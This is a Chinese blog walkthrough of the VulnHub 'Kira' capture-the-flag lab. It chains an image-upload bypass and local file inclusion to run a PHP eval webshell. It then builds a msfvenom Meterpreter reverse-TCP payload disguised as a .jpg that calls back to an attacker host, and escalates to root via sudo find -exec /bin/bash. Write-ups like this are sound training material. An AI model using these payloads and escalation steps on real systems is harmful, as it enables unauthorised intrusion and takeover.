Kira
- 写写打靶记录。
- 靶机地址:https://www.vulnhub.com/entry/kira-ctf,594
信息收集
- 由于将 Kali 与 靶机在 VM 上使用桥接连接(VM 一改网卡直接报错退出),这里靶机没有密码可以直接登录,直接看 IP 就不扫了。
- 首先查看靶机 IP 地址:
1 | ┌──(root㉿kali)-[/opt/antsword] |
- 扫描开放端口:
1 | ┌──(root㉿kali)-[~] |
- 扫描端口对应服务:
1 | ──(root㉿kali)-[~] |
- 扫描出 80 端口的 Web 服务,其他端口没啥收获,访问一下 Web 服务:
文件上传
- 就俩端口,其中一个看着是文件上传,试一试。
- 写个木马:
1 | eval($_REQUEST[cmd]); @ |
- 但是上传失败了。
- 经过尝试,只能上传图片格式结尾的文件,那就换个地方试试。
文件包含
- language按钮,好像也没啥东西:
- 经过简单尝试,发现再次点击时,会出现参数提交,加上 title 给的提示,应该存在文件包含:
- 看提示,应该不存在远程文件包含,这里就不尝试了,直接看看包含密码文件:
- 包含一下 id_rsa 文件:
- 没东东,回想一下刚刚的文件上传,这里有文件包含,全了,利用一下,猜测路径为/var/www/html/upload/:
- 木马上传成功~
MSF 上马
- 这里不使用 AntSword 了,使用 MSF 上马,命令如下:
1 | msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -o msf.jpg |
- 开启监听:
1 | use exploit/multi/handler |
- 成功上线:
find 提权
- 升级一下 Shell:
1 | python3 -c 'import pty;pty.spawn("/bin/bash")' |
- 查看一下可登录用户:
1 | www-data@bassam-aziz:/var/www/html$ cat /etc/passwd | grep /bin/bash |
- 去 bassam 家目录看看:
- 发现一个 user.txt 但是没权限看。
- 查看一下用户相关文件:
- 发现一个 txt,查看一下:
1 | Password123!@# |
- 感觉像 bassam 的密码,登录一下:
1 | su bassam |
- 切换成功!sudo -l 查看一下
1 | bassam@bassam-aziz:~$ sudo -l |
- 发现了 find 有,root 执行权限,提权命令如下:
1 | sudo -u root /usr/bin/find . -exec /bin/bash \; |
- 提权成功~:
1 | bassam@bassam-aziz:~$ sudo -u root /usr/bin/find . -exec /bin/bash \; |
- 查看一下之前的 user.txt 文件:
1 | THM{Bassam-Is-Better_Than-KIRA} |
- 在查看一下 root 目录:
1 | root@bassam-aziz:~# cd /root |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Yongz丶!